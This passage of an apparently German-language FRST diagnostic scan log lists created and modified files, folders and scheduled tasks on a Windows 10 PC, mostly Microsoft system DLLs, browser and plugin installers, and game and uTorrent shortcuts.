2016-01-28 18:30 - 2016-01-16 07:23 - 00785088 _____ (Microsoft Corporation) C:\WINDOWS\system32\evr.dll
2016-01-28 18:30 - 2016-01-16 07:23 - 00536256 _____ (Microsoft Corporation) C:\WINDOWS\system32\AudioSes.dll
2016-01-28 18:30 - 2016-01-16 07:23 - 00408120 _____ (Microsoft Corporation) C:\WINDOWS\system32\AUDIOKSE.dll
2016-01-28 18:30 - 2016-01-16 07:23 - 00369912 _____ (Microsoft Corporation) C:\WINDOWS\system32\audiodg.exe
2016-01-28 18:30 - 2016-01-16 07:21 - 22572624 _____ (Microsoft Corporation) C:\WINDOWS\system32\shell32.dll
2016-01-28 18:30 - 2016-01-16 07:21 - 01750440 _____ (Microsoft Corporation) C:\WINDOWS\system32\WpcMon.exe
2016-01-28 18:30 - 2016-01-16 07:20 - 06600904 _____ (Microsoft Corporation) C:\WINDOWS\system32\windows.storage.dll
2016-01-28 18:30 - 2016-01-16 07:20 - 00652312 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\evr.dll
2016-01-28 18:30 - 2016-01-16 07:20 - 00431240 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WWanAPI.dll
2016-01-28 18:30 - 2016-01-16 07:20 - 00366224 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AUDIOKSE.dll
2016-01-28 18:30 - 2016-01-16 07:19 - 00709688 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfsvr.dll
2016-01-28 18:30 - 2016-01-16 07:19 - 00405568 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AudioSes.dll
2016-01-28 18:30 - 2016-01-16 07:17 - 21125400 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\shell32.dll
2016-01-28 18:30 - 2016-01-16 07:16 - 05238360 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\windows.storage.dll
2016-01-28 18:30 - 2016-01-16 07:13 - 01998168 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgkrnl.sys
2016-01-28 18:30 - 2016-01-16 07:13 - 00576864 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgmms2.sys
2016-01-28 18:30 - 2016-01-16 07:12 - 01415200 _____ (Microsoft Corporation) C:\WINDOWS\system32\msctf.dll
2016-01-28 18:30 - 2016-01-16 07:09 - 01089880 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\http.sys
2016-01-28 18:30 - 2016-01-16 07:08 - 01174008 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msctf.dll
2016-01-28 18:30 - 2016-01-16 07:08 - 00440152 _____ (Microsoft Corporation) C:\WINDOWS\system32\services.exe
2016-01-28 18:30 - 2016-01-16 06:46 - 00067072 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\usbser.sys
2016-01-28 18:30 - 2016-01-16 06:45 - 16986112 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Xaml.dll
2016-01-28 18:30 - 2016-01-16 06:44 - 00166400 _____ (Microsoft Corporation) C:\WINDOWS\system32\MusNotification.exe
2016-01-28 18:30 - 2016-01-16 06:44 - 00017408 _____ (Microsoft Corporation) C:\WINDOWS\system32\rasadhlp.dll
2016-01-28 18:30 - 2016-01-16 06:44 - 00013824 _____ (Microsoft Corporation) C:\WINDOWS\system32\rastlsext.dll
2016-01-28 18:30 - 2016-01-16 06:43 - 00097280 _____ (Microsoft Corporation) C:\WINDOWS\system32\winhttpcom.dll
2016-01-28 18:30 - 2016-01-16 06:42 - 00120320 _____ (Microsoft Corporation) C:\WINDOWS\system32\MapsBtSvc.dll
2016-01-28 18:30 - 2016-01-16 06:42 - 00013824 _____ (Microsoft Corporation) C:\WINDOWS\system32\sscoreext.dll
2016-01-28 18:30 - 2016-01-16 06:41 - 00055296 _____ (Microsoft Corporation) C:\WINDOWS\system32\MusNotificationUx.exe
2016-01-28 18:30 - 2016-01-16 06:40 - 11545088 _____ (Microsoft Corporation) C:\WINDOWS\system32\twinui.dll
2016-01-28 18:30 - 2016-01-16 06:40 - 00106496 _____ (Microsoft Corporation) C:\WINDOWS\system32\rasauto.dll
2016-01-28 18:30 - 2016-01-16 06:40 - 00049152 _____ (Microsoft Corporation) C:\WINDOWS\system32\pcaui.exe
2016-01-28 18:30 - 2016-01-16 06:40 - 00019456 _____ (Microsoft Corporation) C:\WINDOWS\system32\rasautou.exe
2016-01-28 18:30 - 2016-01-16 06:39 - 00149504 _____ (Microsoft Corporation) C:\WINDOWS\system32\FilterDS.dll
2016-01-28 18:30 - 2016-01-16 06:38 - 07979008 _____ (Microsoft Corporation) C:\WINDOWS\system32\mos.dll
2016-01-28 18:30 - 2016-01-16 06:38 - 00406528 _____ (Microsoft Corporation) C:\WINDOWS\system32\MusUpdateHandlers.dll
2016-01-28 18:30 - 2016-01-16 06:38 - 00193024 _____ (Microsoft Corporation) C:\WINDOWS\system32\SimCfg.dll
2016-01-28 18:30 - 2016-01-16 06:38 - 00130560 _____ (Microsoft Corporation) C:\WINDOWS\system32\winbio.dll
2016-01-28 18:30 - 2016-01-16 06:37 - 00617984 _____ (Microsoft Corporation) C:\WINDOWS\system32\StorSvc.dll
2016-01-28 18:30 - 2016-01-16 06:37 - 00274944 _____ (Microsoft Corporation) C:\WINDOWS\system32\DisplayManager.dll
2016-01-28 18:30 - 2016-01-16 06:37 - 00190464 _____ (Microsoft Corporation) C:\WINDOWS\system32\wscsvc.dll
2016-01-28 18:30 - 2016-01-16 06:37 - 00073728 _____ (Microsoft Corporation) C:\WINDOWS\system32\SMSRouter.dll
2016-01-28 18:30 - 2016-01-16 06:36 - 00638464 _____ (Microsoft Corporation) C:\WINDOWS\system32\enterprisecsps.dll
2016-01-28 18:30 - 2016-01-16 06:36 - 00475648 _____ (Microsoft Corporation) C:\WINDOWS\system32\DDDS.dll
2016-01-28 18:30 - 2016-01-16 06:36 - 00221696 _____ (Microsoft Corporation) C:\WINDOWS\system32\ie4uinit.exe
2016-01-28 18:30 - 2016-01-16 06:36 - 00160768 _____ (Microsoft Corporation) C:\WINDOWS\system32\SimAuth.dll
2016-01-28 18:30 - 2016-01-16 06:36 - 00011776 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\rastlsext.dll
2016-01-28 18:30 - 2016-01-16 06:35 - 13018624 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Xaml.dll
2016-01-28 18:30 - 2016-01-16 06:35 - 00383488 _____ (Microsoft Corporation) C:\WINDOWS\system32\iedkcs32.dll
2016-01-28 18:30 - 2016-01-16 06:35 - 00013312 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\rasadhlp.dll
2016-01-28 18:30 - 2016-01-16 06:34 - 00610816 _____ (Microsoft Corporation) C:\WINDOWS\system32\rastls.dll
2016-01-28 18:30 - 2016-01-16 06:34 - 00590848 _____ (Microsoft Corporation) C:\WINDOWS\system32\SmsRouterSvc.dll
2016-01-28 18:30 - 2016-01-16 06:34 - 00477696 _____ (Microsoft Corporation) C:\WINDOWS\system32\srcore.dll
2016-01-28 18:30 - 2016-01-16 06:34 - 00275456 _____ (Microsoft Corporation) C:\WINDOWS\system32\AudioEndpointBuilder.dll
2016-01-28 18:30 - 2016-01-16 06:34 - 00079360 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\winhttpcom.dll
2016-01-28 18:30 - 2016-01-16 06:33 - 00726528 _____ (Microsoft Corporation) C:\WINDOWS\system32\wlidcli.dll
2016-01-28 18:30 - 2016-01-16 06:33 - 00574976 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Networking.UX.EapRequestHandler.dll
2016-01-28 18:30 - 2016-01-16 06:33 - 00087040 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MapsBtSvc.dll
2016-01-28 18:30 - 2016-01-16 06:32 - 24602624 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtml.dll
2016-01-28 18:30 - 2016-01-16 06:32 - 00621568 _____ (Microsoft Corporation) C:\WINDOWS\system32\wbiosrvc.dll
2016-01-28 18:30 - 2016-01-16 06:32 - 00041984 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\pcaui.exe
2016-01-28 18:30 - 2016-01-16 06:31 - 00851456 _____ (Microsoft Corporation) C:\WINDOWS\system32\MapsStore.dll
2016-01-28 18:30 - 2016-01-16 06:31 - 00794112 _____ (Microsoft Corporation) C:\WINDOWS\system32\winhttp.dll
2016-01-28 18:30 - 2016-01-16 06:31 - 00440320 _____ (Microsoft Corporation) C:\WINDOWS\system32\CredProvDataModel.dll
2016-01-28 18:30 - 2016-01-16 06:31 - 00343552 _____ (Microsoft Corporation) C:\WINDOWS\system32\SensorsApi.dll
2016-01-28 18:30 - 2016-01-16 06:31 - 00017408 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\rasautou.exe
2016-01-28 18:30 - 2016-01-16 06:30 - 13382656 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieframe.dll
2016-01-28 18:30 - 2016-01-16 06:30 - 02127360 _____ (Microsoft Corporation) C:\WINDOWS\system32\inetcpl.cpl
2016-01-28 18:30 - 2016-01-16 06:30 - 01053696 _____ (Microsoft Corporation) C:\WINDOWS\system32\audiosrv.dll
2016-01-28 18:30 - 2016-01-16 06:30 - 00784384 _____ (Microsoft Corporation) C:\WINDOWS\system32\msfeeds.dll
2016-01-28 18:30 - 2016-01-16 06:30 - 00157696 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SimCfg.dll
2016-01-28 18:30 - 2016-01-16 06:30 - 00093696 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\winbio.dll
2016-01-28 18:30 - 2016-01-16 06:29 - 01500672 _____ (Microsoft Corporation) C:\WINDOWS\system32\RecoveryDrive.exe
2016-01-28 18:30 - 2016-01-16 06:29 - 00200704 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\DisplayManager.dll
2016-01-28 18:30 - 2016-01-16 06:28 - 09918976 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\twinui.dll
2016-01-28 18:30 - 2016-01-16 06:28 - 02624512 _____ (Microsoft Corporation) C:\WINDOWS\system32\InputService.dll
2016-01-28 18:30 - 2016-01-16 06:28 - 01318912 _____ (Microsoft Corporation) C:\WINDOWS\system32\wifinetworkmanager.dll
2016-01-28 18:30 - 2016-01-16 06:28 - 00884736 _____ (Microsoft Corporation) C:\WINDOWS\system32\rasdlg.dll
2016-01-28 18:30 - 2016-01-16 06:28 - 00129024 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SimAuth.dll
2016-01-28 18:30 - 2016-01-16 06:27 - 00335872 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iedkcs32.dll
2016-01-28 18:30 - 2016-01-16 06:26 - 19338752 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mshtml.dll
2016-01-28 18:30 - 2016-01-16 06:26 - 00535040 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\rastls.dll
2016-01-28 18:30 - 2016-01-16 06:26 - 00345600 _____ (Microsoft Corporation) C:\WINDOWS\system32\TextInputFramework.dll
2016-01-28 18:30 - 2016-01-16 06:26 - 00260608 _____ C:\WINDOWS\system32\MTFServer.dll
2016-01-28 18:30 - 2016-01-16 06:26 - 00175616 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Core.TextInput.dll
2016-01-28 18:30 - 2016-01-16 06:25 - 00510976 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wlidcli.dll
2016-01-28 18:30 - 2016-01-16 06:25 - 00457728 _____ (Microsoft Corporation) C:\WINDOWS\system32\ipnathlp.dll
2016-01-28 18:30 - 2016-01-16 06:25 - 00235008 _____ C:\WINDOWS\system32\MTF.dll
2016-01-28 18:30 - 2016-01-16 06:24 - 18678272 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\edgehtml.dll
2016-01-28 18:30 - 2016-01-16 06:24 - 02057216 _____ (Microsoft Corporation) C:\WINDOWS\system32\wlidsvc.dll
2016-01-28 18:30 - 2016-01-16 06:24 - 00613888 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\winhttp.dll
2016-01-28 18:30 - 2016-01-16 06:24 - 00350720 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CredProvDataModel.dll
2016-01-28 18:30 - 2016-01-16 06:24 - 00273408 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SensorsApi.dll
2016-01-28 18:30 - 2016-01-16 06:23 - 02050048 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\inetcpl.cpl
2016-01-28 18:30 - 2016-01-16 06:23 - 00687616 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msfeeds.dll
2016-01-28 18:30 - 2016-01-16 06:21 - 06297088 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mos.dll
2016-01-28 18:30 - 2016-01-16 06:20 - 07199232 _____ (Microsoft Corporation) C:\WINDOWS\system32\BingMaps.dll
2016-01-28 18:30 - 2016-01-16 06:20 - 02597888 _____ (Microsoft Corporation) C:\WINDOWS\system32\NetworkMobileSettings.dll
2016-01-28 18:30 - 2016-01-16 06:20 - 01944576 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\InputService.dll
2016-01-28 18:30 - 2016-01-16 06:20 - 00799744 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\rasdlg.dll
2016-01-28 18:30 - 2016-01-16 06:19 - 12126208 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieframe.dll
2016-01-28 18:30 - 2016-01-16 06:19 - 00733184 _____ (Microsoft Corporation) C:\WINDOWS\system32\rasapi32.dll
2016-01-28 18:30 - 2016-01-16 06:19 - 00245760 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\TextInputFramework.dll
2016-01-28 18:30 - 2016-01-16 06:19 - 00162816 _____ C:\WINDOWS\SysWOW64\MTF.dll
2016-01-28 18:30 - 2016-01-16 06:19 - 00133632 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Core.TextInput.dll
2016-01-28 18:30 - 2016-01-16 06:18 - 03593216 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32kfull.sys
2016-01-28 18:30 - 2016-01-16 06:18 - 01674240 _____ (Microsoft Corporation) C:\WINDOWS\system32\quartz.dll
2016-01-28 18:30 - 2016-01-16 06:17 - 05503488 _____ (Microsoft Corporation) C:\WINDOWS\system32\d2d1.dll
2016-01-28 18:30 - 2016-01-16 06:16 - 05202944 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\BingMaps.dll
2016-01-28 18:30 - 2016-01-16 06:16 - 01542656 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\quartz.dll
2016-01-28 18:30 - 2016-01-16 06:15 - 04759040 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\d2d1.dll
2016-01-28 18:30 - 2016-01-16 06:14 - 01946624 _____ (Microsoft Corporation) C:\WINDOWS\system32\dwmcore.dll
2016-01-28 18:30 - 2016-01-16 06:14 - 01626624 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dwmcore.dll
2016-01-28 18:30 - 2016-01-16 06:11 - 00653312 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\rasapi32.dll
2016-01-28 18:30 - 2016-01-16 06:09 - 01087488 _____ (Microsoft Corporation) C:\WINDOWS\system32\reseteng.dll
2016-01-26 20:58 - 2016-01-26 20:58 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Silverlight
2016-01-26 20:58 - 2016-01-26 20:58 - 00000000 ____D C:\Program Files\Microsoft Silverlight
2016-01-26 20:58 - 2016-01-26 20:58 - 00000000 ____D C:\Program Files (x86)\Microsoft Silverlight
2016-01-26 20:57 - 2016-01-26 20:58 - 13163744 _____ (Microsoft Corporation) C:\Users\Deniz\Downloads\Silverlight_x64.exe
2016-01-18 17:52 - 2016-01-18 17:52 - 00010845 _____ C:\Users\Deniz\Downloads\Diktat.pdf
2016-01-18 12:32 - 2016-01-18 12:32 - 03789713 _____ C:\Users\Deniz\Downloads\Schutzpolizei_Seite_8-19.pdf
2016-01-15 23:52 - 2016-02-03 13:43 - 00000000 ____D C:\Users\Deniz\Desktop\Hesse & Schrader Testtraining 2000+
2016-01-14 22:18 - 2016-01-14 22:26 - 00000000 ____D C:\ProgramData\Norton
2016-01-14 22:18 - 2016-01-14 22:18 - 00000000 ____D C:\ProgramData\NortonInstaller
2016-01-14 21:49 - 2016-01-14 21:50 - 00107265 _____ C:\Users\Deniz\Desktop\GÖPA_Computeranleitung.pdf
2016-01-14 19:17 - 2016-01-14 19:17 - 05032952 _____ (Adobe Systems Inc.) C:\Users\Deniz\Downloads\Shockwave_Installer_Slim.exe
2016-01-14 19:17 - 2016-01-14 19:17 - 00000000 ____D C:\WINDOWS\SysWOW64\Adobe
2016-01-13 23:59 - 2016-02-04 17:51 - 00002264 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2016-01-13 23:58 - 2016-02-04 20:08 - 00001134 _____ C:\WINDOWS\Tasks\GoogleUpdateTaskMachineUA.job
2016-01-13 23:58 - 2016-02-04 17:53 - 00001130 _____ C:\WINDOWS\Tasks\GoogleUpdateTaskMachineCore.job
2016-01-13 23:58 - 2016-02-03 22:59 - 00000000 ____D C:\Users\Deniz\AppData\Local\Google
2016-01-13 23:58 - 2016-02-03 13:03 - 00004192 _____ C:\WINDOWS\System32\Tasks\GoogleUpdateTaskMachineUA
2016-01-13 23:58 - 2016-02-03 13:03 - 00003960 _____ C:\WINDOWS\System32\Tasks\GoogleUpdateTaskMachineCore
2016-01-13 23:58 - 2016-01-13 23:59 - 00000000 ____D C:\Program Files (x86)\Google
2016-01-13 23:58 - 2016-01-13 23:58 - 00927824 _____ (Google Inc.) C:\Users\Deniz\Downloads\ChromeSetup.exe
2016-01-13 20:28 - 2016-01-05 03:37 - 02544256 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfcore.dll
2016-01-13 20:28 - 2016-01-05 03:33 - 02180128 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfcore.dll
2016-01-13 20:28 - 2016-01-05 02:39 - 03428864 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.dll
2016-01-13 20:27 - 2016-01-05 03:51 - 07477600 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntoskrnl.exe
2016-01-13 20:27 - 2016-01-05 03:51 - 01317640 _____ (Microsoft Corporation) C:\WINDOWS\system32\winload.efi
2016-01-13 20:27 - 2016-01-05 03:51 - 01141496 _____ (Microsoft Corporation) C:\WINDOWS\system32\winload.exe
2016-01-13 20:27 - 2016-01-05 03:50 - 00671472 _____ (Microsoft Corporation) C:\WINDOWS\system32\advapi32.dll
2016-01-13 20:27 - 2016-01-05 03:48 - 00499432 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\advapi32.dll
2016-01-13 20:27 - 2016-01-05 03:45 - 02587696 _____ (Microsoft Corporation) C:\WINDOWS\system32\msxml6.dll
2016-01-13 20:27 - 2016-01-05 03:42 - 02026736 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msxml6.dll
2016-01-13 20:27 - 2016-01-05 03:37 - 01299504 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfnetsrc.dll
2016-01-13 20:27 - 2016-01-05 03:37 - 00858952 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfnetcore.dll
2016-01-13 20:27 - 2016-01-05 03:37 - 00245840 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfps.dll
2016-01-13 20:27 - 2016-01-05 03:37 - 00234504 _____ (Microsoft Corporation) C:\WINDOWS\system32\mftranscode.dll
2016-01-13 20:27 - 2016-01-05 03:36 - 00808800 _____ (Microsoft Corporation) C:\WINDOWS\system32\WWAHost.exe
2016-01-13 20:27 - 2016-01-05 03:33 - 01118208 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfnetsrc.dll
2016-01-13 20:27 - 2016-01-05 03:33 - 00701384 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfnetcore.dll
2016-01-13 20:27 - 2016-01-05 03:33 - 00208176 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mftranscode.dll
2016-01-13 20:27 - 2016-01-05 03:33 - 00116728 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfps.dll
2016-01-13 20:27 - 2016-01-05 03:31 - 00703840 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WWAHost.exe
2016-01-13 20:27 - 2016-01-05 03:27 - 01594408 _____ (Microsoft Corporation) C:\WINDOWS\system32\gdi32.dll
2016-01-13 20:27 - 2016-01-05 03:24 - 00796352 _____ (Microsoft Corporation) C:\WINDOWS\system32\generaltel.dll
2016-01-13 20:27 - 2016-01-05 03:23 - 01804664 _____ (Microsoft Corporation) C:\WINDOWS\system32\WMALFXGFXDSP.dll
2016-01-13 20:27 - 2016-01-05 03:23 - 01309376 _____ (Microsoft Corporation) C:\WINDOWS\system32\appraiser.dll
2016-01-13 20:27 - 2016-01-05 03:23 - 00786696 _____ (Microsoft Corporation) C:\WINDOWS\system32\WMADMOD.DLL
2016-01-13 20:27 - 2016-01-05 03:23 - 00119320 _____ (Microsoft Corporation) C:\WINDOWS\system32\MP3DMOD.DLL
2016-01-13 20:27 - 2016-01-05 03:21 - 01371792 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\gdi32.dll
2016-01-13 20:27 - 2016-01-05 03:17 - 00695752 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WMADMOD.DLL
2016-01-13 20:27 - 2016-01-05 03:16 - 00100160 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MP3DMOD.DLL
2016-01-13 20:27 - 2016-01-05 02:57 - 00076288 _____ (Microsoft Corporation) C:\WINDOWS\system32\RMSRoamingSecurity.dll
2016-01-13 20:27 - 2016-01-05 02:57 - 00043520 _____ (Microsoft Corporation) C:\WINDOWS\system32\usermgrcli.dll
2016-01-13 20:27 - 2016-01-05 02:56 - 00145920 _____ (Microsoft Corporation) C:\WINDOWS\system32\omadmclient.exe
2016-01-13 20:27 - 2016-01-05 02:54 - 00162816 _____ (Microsoft Corporation) C:\WINDOWS\system32\DeviceCensus.exe
2016-01-13 20:27 - 2016-01-05 02:53 - 00148992 _____ (Microsoft Corporation) C:\WINDOWS\system32\wshom.ocx
2016-01-13 20:27 - 2016-01-05 02:52 - 00210432 _____ (Microsoft Corporation) C:\WINDOWS\system32\aepic.dll
2016-01-13 20:27 - 2016-01-05 02:51 - 00472576 _____ (Microsoft Corporation) C:\WINDOWS\system32\DscCore.dll
2016-01-13 20:27 - 2016-01-05 02:51 - 00248832 _____ (Microsoft Corporation) C:\WINDOWS\system32\UserMgrProxy.dll
2016-01-13 20:27 - 2016-01-05 02:50 - 00644096 _____ (Microsoft Corporation) C:\WINDOWS\system32\uReFS.dll
2016-01-13 20:27 - 2016-01-05 02:50 - 00208896 _____ (Microsoft Corporation) C:\WINDOWS\system32\storewuauth.dll
2016-01-13 20:27 - 2016-01-05 02:49 - 01582080 _____ (Microsoft Corporation) C:\WINDOWS\system32\aitstatic.exe
2016-01-13 20:27 - 2016-01-05 02:49 - 01255936 _____ (Microsoft Corporation) C:\WINDOWS\system32\WMSPDMOE.DLL
2016-01-13 20:27 - 2016-01-05 02:49 - 00764928 _____ (Microsoft Corporation) C:\WINDOWS\system32\Chakradiag.dll
2016-01-13 20:27 - 2016-01-05 02:49 - 00749056 _____ (Microsoft Corporation) C:\WINDOWS\system32\PhoneService.dll
2016-01-13 20:27 - 2016-01-05 02:49 - 00167936 _____ (Microsoft Corporation) C:\WINDOWS\system32\ProximityCommon.dll
2016-01-13 20:27 - 2016-01-05 02:48 - 01009152 _____ (Microsoft Corporation) C:\WINDOWS\system32\WMSPDMOD.DLL
2016-01-13 20:27 - 2016-01-05 02:48 - 00387072 _____ (Microsoft Corporation) C:\WINDOWS\system32\qdvd.dll
2016-01-13 20:27 - 2016-01-05 02:48 - 00034816 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\usermgrcli.dll
2016-01-13 20:27 - 2016-01-05 02:47 - 00628736 _____ (Microsoft Corporation) C:\WINDOWS\system32\MessagingDataModel2.dll
2016-01-13 20:27 - 2016-01-05 02:47 - 00479232 _____ (Microsoft Corporation) C:\WINDOWS\system32\schannel.dll
2016-01-13 20:27 - 2016-01-05 02:47 - 00305664 _____ (Microsoft Corporation) C:\WINDOWS\system32\ksproxy.ax
2016-01-13 20:27 - 2016-01-05 02:45 - 00678912 _____ (Microsoft Corporation) C:\WINDOWS\system32\qedit.dll
2016-01-13 20:27 - 2016-01-05 02:45 - 00275968 _____ (Microsoft Corporation) C:\WINDOWS\system32\facecredentialprovider.dll
2016-01-13 20:27 - 2016-01-05 02:44 - 00125440 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wshom.ocx
2016-01-13 20:27 - 2016-01-05 02:43 - 00912384 _____ (Microsoft Corporation) C:\WINDOWS\system32\usermgr.dll
2016-01-13 20:27 - 2016-01-05 02:43 - 00604672 _____ (Microsoft Corporation) C:\WINDOWS\system32\vbscript.dll
2016-01-13 20:27 - 2016-01-05 02:43 - 00584704 _____ (Microsoft Corporation) C:\WINDOWS\system32\winlogon.exe
2016-01-13 20:27 - 2016-01-05 02:42 - 00166912 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\UserMgrProxy.dll
2016-01-13 20:27 - 2016-01-05 02:41 - 01070080 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WMSPDMOE.DLL
2016-01-13 20:27 - 2016-01-05 02:41 - 00558592 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\uReFS.dll
2016-01-13 20:27 - 2016-01-05 02:40 - 00890880 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WMSPDMOD.DLL
2016-01-13 20:27 - 2016-01-05 02:40 - 00123392 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ProximityCommon.dll
2016-01-13 20:27 - 2016-01-05 02:39 - 00569856 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\qdvd.dll
2016-01-13 20:27 - 2016-01-05 02:39 - 00498176 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MessagingDataModel2.dll
2016-01-13 20:27 - 2016-01-05 02:39 - 00235008 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ksproxy.ax
2016-01-13 20:27 - 2016-01-05 02:38 - 00389120 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\schannel.dll
2016-01-13 20:27 - 2016-01-05 02:36 - 00573440 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\qedit.dll
2016-01-13 20:27 - 2016-01-05 02:36 - 00503296 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\vbscript.dll
2016-01-13 20:27 - 2016-01-05 02:30 - 02796032 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.dll
2016-01-13 20:27 - 2016-01-05 02:30 - 02280448 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuaueng.dll
2016-01-13 20:27 - 2016-01-05 02:29 - 03667456 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\jscript9.dll
2016-01-13 20:27 - 2016-01-05 02:28 - 07826432 _____ (Microsoft Corporation) C:\WINDOWS\system32\Chakra.dll
2016-01-13 20:27 - 2016-01-05 02:28 - 04894720 _____ (Microsoft Corporation) C:\WINDOWS\system32\jscript9.dll
2016-01-13 20:27 - 2016-01-05 02:25 - 05660160 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Chakra.dll
2016-01-11 21:22 - 2016-01-15 21:38 - 00000000 ____D C:\Program Files (x86)\Mozilla Firefox

==================== Ein Monat: Geänderte Dateien und Ordner ========

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Datei/der Ordner verschoben.)

2016-02-04 21:01 - 2015-12-05 15:19 - 00000000 ____D C:\Users\Deniz\AppData\Roaming\Skype
2016-02-04 20:09 - 2015-12-24 01:18 - 00000884 _____ C:\WINDOWS\Tasks\Adobe Flash Player Updater.job
2016-02-04 18:28 - 2015-10-30 08:24 - 00000000 ___HD C:\Program Files\WindowsApps
2016-02-04 18:28 - 2015-10-30 08:24 - 00000000 ____D C:\WINDOWS\AppReadiness
2016-02-04 18:27 - 2015-12-05 14:15 - 00000000 ____D C:\ProgramData\NVIDIA
2016-02-04 17:53 - 2015-12-05 14:42 - 00022280 _____ (ASRock Incorporation) C:\WINDOWS\SysWOW64\Drivers\AsrAutoChkUpdDrv.sys
2016-02-04 17:53 - 2015-12-05 14:42 - 00003022 _____ C:\WINDOWS\System32\Tasks\AsrAPPShop
2016-02-04 17:52 - 2015-12-05 14:22 - 00000006 ____H C:\WINDOWS\Tasks\SA.DAT
2016-02-04 17:52 - 2015-10-30 07:28 - 00262144 ___SH C:\WINDOWS\system32\config\BBI
2016-02-04 17:51 - 2015-12-29 16:21 - 00001324 _____ C:\Users\Deniz\Desktop\The Elder Scrolls Online.lnk
2016-02-04 17:51 - 2015-12-29 08:41 - 00000306 __RSH C:\ProgramData\ntuser.pol
2016-02-04 17:51 - 2015-12-29 08:18 - 00001006 _____ C:\Users\Public\Desktop\DS3 Tool.lnk
2016-02-04 17:51 - 2015-12-29 05:43 - 00001243 _____ C:\Users\Deniz\Desktop\Dynasty Warriors 8 Xtreme Legends.lnk
2016-02-04 17:51 - 2015-12-25 01:59 - 00002660 _____ C:\Users\Deniz\Desktop\µTorrent.lnk
